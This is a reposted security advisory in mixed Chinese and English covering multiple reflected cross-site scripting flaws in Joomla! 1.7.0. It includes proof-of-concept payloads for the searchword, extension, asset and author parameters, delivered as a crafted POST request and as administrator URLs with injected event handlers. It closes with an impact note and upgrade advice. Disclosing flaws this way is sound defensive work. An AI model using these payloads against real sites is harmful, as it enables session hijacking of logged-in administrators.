Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities
1. 概述
Joomla! 1.7.0 (stable version) 含多个xss
2. 背景
Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP , uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.
3.缺陷描述
Several parameters (searchword, extension, asset, author ) in Joomla!
Core components are not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim's browser.
4. 影响版本:<=1.7.0
5. PROOF-OF-CONCEPT/EXPLOIT
component: com_search, parameter: searchword (Browser: IE, Konqueror)
=====================================================================
[REQUEST]
POST /joomla17_no seo /index.php HTTP/1.1
Host: HdhCmsTest2cto测试数据
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://HdhCmsTest2cto测试数据 /joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456
task=search&Itemid=435&searchword=Search';onunload=function(){x=confirm(
String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,10
1,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,11
6,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,11
6,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromC
harCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssss
ssssss&option=com_search
[/REQUEST]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
User Login is required to execute the following XSSes.
Parameter: extension, Component: com_categories
====================================================
http://HdhCmsTest2cto测试数据 /joomla17_noseo/administrator/index.php?option=com_categ
ories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style
=%22width:3000px!important;height:3000px!important;z-index:999999;positi
on:absolute!important;left:0;top:0;%22%20x=%22
Parameter: asset , Component: com_media
====================================================
http://HdhCmsTest2cto测试数据 /joomla17_noseo/administrator/index.php?option=com_media
&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmous
eover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000p
x!important;z-index:999999;position:absolute!important;left:0;top:0;%22x
=%22&author=
Parameter: author, Component: com_media
====================================================
http://HdhCmsTest2cto测试数据 /joomla17_noseo/administrator/index.php?option=com_media
&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%
20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;heig
ht:3000px!important;z-index:999999;position:absolute!important;left:0;to
p:0;%22x=%22
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
6. IMPACT
Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.
7. 解决方案
升级到更高版本
8. VENDOR
Joomla! Developer Team
http://HdhCmsTestjoomla.org
#yehg [2011-09-29]
查看更多关于Joomla! 1.7.0多个xss及修复 - 网站安全 - 自学php的详细内容...